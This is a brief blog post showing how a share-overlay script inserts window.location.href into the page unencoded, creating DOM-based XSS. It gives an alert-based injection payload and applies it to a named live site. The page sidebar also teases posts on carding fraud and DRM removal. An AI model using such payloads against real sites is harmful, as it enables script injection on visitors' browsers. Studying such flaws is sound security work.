Exploiting DOM Based Cross-site Scripting (XSS) [location.href]

I just recently found exploitable DOM Based XSS vulnerability because of Vulnerable JavaScript dependency(Jquery).

Okay, let see an example of vulnerable code.

function sfsi_mobile_jake_share(url) {
    if (jQuery('.sfsi_jake_follow_overlay')
        .length == 0) {
        jQuery('body')
            .append("<div class='sfsi_jake_follow_overlay sfsi_overlay show'><div class='sfsi_inner_display'><a class='close_btn' href='' onclick=\"event.preventDefault();close_overlay(\'.sfsi_jake_follow_overlay\')\" >×</a><div style='width:95%; min-height:80%;background-color:#fff;margin:0 auto;margin:30% auto;padding: 20px 0;'><div style='width:90%;margin: 0 auto;'><input type='text' value='" + window.location.href + "' style='width:100%;padding:7px 0;text-align:center' /></div><div style='width:80%;margin:10px auto 0 auto'><div class='sfsi_upload_butt_container' ><button onclick='sfsi_copy_text_parent_input(event)' class='upload_butt' >Copy</button></div><div class='sfsi_upload_butt_container' ><a href='weixin://' class='upload_butt'>Open This Element</a></div></div></div></div>");
        

Okay, as you can see in this code replacing “window.location.href” object without encoding, So means it’s vulnerable to execute malicious code lines.

Let’s exploit it!
First, visit that vulnerable website URL that using javascript dependency like that as I mentioned above.
Example: http://cyberscap.com/

Then add #’><img src=x onerror=alert(document.domain)>

After that your vulnerable website URL should be like this: http://cyberscap.com/#’><img src=x onerror=alert(document.domain)>

But it will no longer work on web browsers like Chrome. Cause they have a default encode for “location.href” object. Anyhow it’s still exploitable on Edge. etc…

Akalanka Ekanayakehttps://akalanka.uk
Security Researcher & Explorer

Related Stories

Advertisement

Discover

Learn How To Manage Your Stress Using 10 Tips!

These days it is hard not to be weighed down once in a while....

Online Fraud Keywords Explained (Part 2)

Hey, Before reading this please read my first article about this title. (Part 1)PAYMENT...

Online/Physical Carding Explained (Online Fraud Part 1)

Fraud is something I have been doing for many years, even before internet fraud...

Exploiting DOM Based Cross-site Scripting (XSS) [location.href]

I just recently found exploitable DOM Based XSS vulnerability because of Vulnerable JavaScript dependency(Jquery).Okay,...

Downloading music from Spotify without DRM protection.

DRM, short for Digital Rights Management, is created to protect copyrights and restrict the...

The drugs that improve your sexual life.

This might be an interesting article for all of you. There are so many...

Popular Categories

Comments

LEAVE A REPLY

Please enter your comment!
Please enter your name here